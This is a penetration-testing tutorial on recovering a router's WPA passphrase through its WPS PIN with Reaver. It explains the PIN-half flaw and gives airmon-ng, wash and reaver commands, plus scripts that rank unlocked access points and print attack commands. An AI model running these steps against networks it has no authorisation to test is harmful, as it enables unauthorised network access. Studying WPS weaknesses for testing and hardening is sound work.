REAVER: Cracking WI-FI with WPS ENABLED – Penetration Testing

WPS is short for Wi-Fi Protected Setup, a method of establishing a connection between a wireless device and a wireless router that was released in 2007. Normally, to connect a wireless device to a router you need to know the network name (SSID) and its password. With WPS you can instead connect using any of the methods below.

PIN from the router: on a device that supports WPS, enter the router's eight-digit WPS PIN to connect to it.

Push button on both sides: if your wireless device has a WPS button of its own, press the WPS button on the router and then the WPS button on the device to join the network.

Push button on the router only: press the WPS button on the router, then find and select the network from the wireless device; it connects without a password being entered.

PIN from the device: for wireless devices that generate their own eight-digit WPS PIN, enter that PIN in the router's setup page to enrol the device.

Where is the WPS PIN or WPS Key?

The WPS PIN can be found on the back or bottom of the router. With most routers, the WPS PIN is on a sticker and is an eight-digit number.

Disadvantages with WPS

Although WPS can make it easier to connect wireless devices to your network, there are some distinct disadvantages of WPS.

If your wireless router is in an insecure area, anyone could press the WPS button on the back of the router and be able to connect to your network.

Every WPS access point has an eight-digit PIN (technically seven digits, since the last digit is a checksum). Because the protocol confirms the first half of the PIN separately from the second half, an attacker can brute-force the PIN in far fewer attempts than eight digits would suggest, and with the PIN obtain the network passphrase.

On most routers the WPS PIN cannot be changed, so a PIN that has been recovered once stays valid until WPS is disabled.

WPS only works with WPA or WPA2 security and does not support older devices with WEP.

Although WPS makes it easier to connect wireless devices to your network, because of these disadvantages you may want to disable WPS in your router's setup.

Reaver implements a brute-force attack against Wi-Fi Protected Setup that can recover the WPS PIN of an access point in a matter of hours and, from it, the WPA/WPA2 passphrase. Specifically, Reaver targets the external registrar functionality of WPS, which is flawed in that the access point's responses reveal whether the first four digits of the PIN are correct independently of the last four. At most 11,000 attempts (10,000 for the first half plus 1,000 for the second half, whose last digit is a checksum) are therefore needed to become a WPS registrar. Once registered as a registrar, the access point hands over the WPA passphrase.
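The check digit mentioned in the disadvantages above and the 11,000-attempt bound are easy to verify. The following is an added example, not code from the original post or from the Reaver project: it computes the WPS check digit, validates an eight-digit PIN, and states the search space the registrar flaw leaves an attacker next to the naive one. The function names are my own.

```shell
#!/bin/sh
# Added example, not code from the original post or from the Reaver project:
# the WPS PIN check digit and the size of the search space the registrar
# flaw leaves an attacker. Function names here are my own.

# wps_checksum BODY7 -> prints the check digit for a 7-digit PIN body.
# Digits in odd positions (1st, 3rd, 5th, 7th) are weighted 3, the others 1;
# the check digit is whatever makes the weighted sum a multiple of 10.
wps_checksum() (
    body=$1; acc=0; i=1
    while [ "$i" -le 7 ]; do
        d=$(printf '%s' "$body" | cut -c"$i")
        if [ $((i % 2)) -eq 1 ]; then
            acc=$((acc + 3 * d))
        else
            acc=$((acc + d))
        fi
        i=$((i + 1))
    done
    echo $(( (10 - acc % 10) % 10 ))
)

# wps_pin_valid PIN8 -> succeeds only for an 8-digit PIN whose last digit
# is the correct check digit for the first seven.
wps_pin_valid() (
    pin=$1
    case $pin in
        [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]) ;;
        *) return 1 ;;
    esac
    body=$(printf '%s' "$pin" | cut -c1-7)
    last=$(printf '%s' "$pin" | cut -c8)
    [ "$(wps_checksum "$body")" = "$last" ]
)

# wps_search_space -> worst-case number of PIN attempts against an AP that
# confirms each half of the PIN separately: 10^4 for the first four digits
# plus 10^3 for the last four, since the 8th digit is the checksum.
wps_search_space() {
    echo $(( 10000 + 1000 ))
}

# wps_naive_space -> attempts if the halves were not confirmed separately:
# every 7-digit body with its forced check digit.
wps_naive_space() {
    echo 10000000
}

# Demo run: one valid PIN, one with a bad check digit, one valid all-nines PIN.
for pin in 12345670 12345678 99999995; do
    if wps_pin_valid "$pin"; then r=valid; else r=invalid; fi
    printf '%s %s\n' "$pin" "$r"
done
printf 'registrar flaw: %s attempts vs %s naive\n' "$(wps_search_space)" "$(wps_naive_space)"
```

The weighting (3, 1, 3, 1, 3, 1, 3) is the one the WPS specification uses, and it is why Reaver only has to try 1,000 candidates for the second half: the eighth digit is determined by the other seven.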

Cracking WI-FI with WPS ENABLED

Start the wireless card in monitor mode (airmon-ng prints the name of the monitor interface it creates, wlan0mon below):

airmon-ng start wlan0

List the nearby networks that have WPS enabled:

wash -i wlan0mon

Using Reaver

reaver -i wlan0mon -vv -b XX:XX:XX:XX:XX:XX

Description

-i wlan0mon   the monitor-mode interface to use.

-b XX:XX:XX:XX:XX:XX   the BSSID (MAC address) of the access point being attacked.

-vv   -v, --verbose displays non-critical warnings; -vv makes the output more verbose.

Additional useful options:

-t 2   sets the receive timeout (5 seconds by default), here to 2 seconds.

-d 0   sets the delay between PIN attempts (1 second by default), here to 0.

Lowering the timeout and delay speeds up the run, but many access points lock WPS after a burst of failed attempts; if Reaver reports that the access point is rate limiting, it pauses and the attack can take far longer than the ideal few hours.

Key found
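The procedure above is typed by hand; when wash lists several networks, it helps to pick the target systematically. The following is an added example, not code from the original post or from the Reaver/wash project: it filters wash output for access points whose WPS is not locked, orders them by signal strength, and prints the matching reaver invocation for each. The wash sample is constructed here in the column layout of recent wash releases (BSSID, Ch, dBm, WPS, Lck, Vendor, ESSID) and the function names are my own; check the header line of your own wash run before trusting the column numbers.

```shell
#!/bin/sh
# Added example, not code from the original post or from the Reaver/wash
# project: choose Reaver targets from wash output and build the reaver
# command line. WASH_SAMPLE is constructed here in the column layout of
# recent wash releases (BSSID Ch dBm WPS Lck Vendor ESSID); check the
# header line of your own wash run before trusting the column numbers.

WASH_SAMPLE='BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:11:22:33:44:55    6  -45  2.0  No   RalinkTe  HomeNet
66:77:88:99:AA:BB   11  -70  1.0  Yes  Broadcom  Office
CC:DD:EE:FF:00:11    1  -60  2.0  No   AtherosC  Cafe'

# wps_targets  (reads wash output on stdin) -> "BSSID CHANNEL" per AP whose
# WPS is not locked, strongest signal first. An AP showing Lck = Yes has
# already rate-limited or disabled WPS after failed attempts; Reaver only
# stalls against it, so it is skipped.
wps_targets() {
    awk 'length($1) == 17 && $1 ~ /^[0-9A-Fa-f:]+$/ && $5 == "No" { print $3, $1, $2 }' \
        | sort -k1,1nr \
        | awk '{ print $2, $3 }'
}

# reaver_cmd BSSID CHANNEL -> prints (does not run) the reaver invocation.
# -c fixes the channel so the interface does not hop while Reaver works;
# -t 2 and -d 0 are the timeout and delay options from the description above.
reaver_cmd() {
    printf 'reaver -i wlan0mon -b %s -c %s -vv -t 2 -d 0\n' "$1" "$2"
}

# Demo: list the commands you would run, best target first.
printf '%s\n' "$WASH_SAMPLE" | wps_targets | while read -r bssid ch; do
    reaver_cmd "$bssid" "$ch"
done
```

Locked access points are dropped on purpose: a lock means the router has already noticed failed PIN attempts, and Reaver will sit waiting for it to clear rather than make progress.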

The post REAVER: Cracking WI-FI with WPS ENABLED appeared first on Penetration Testing.
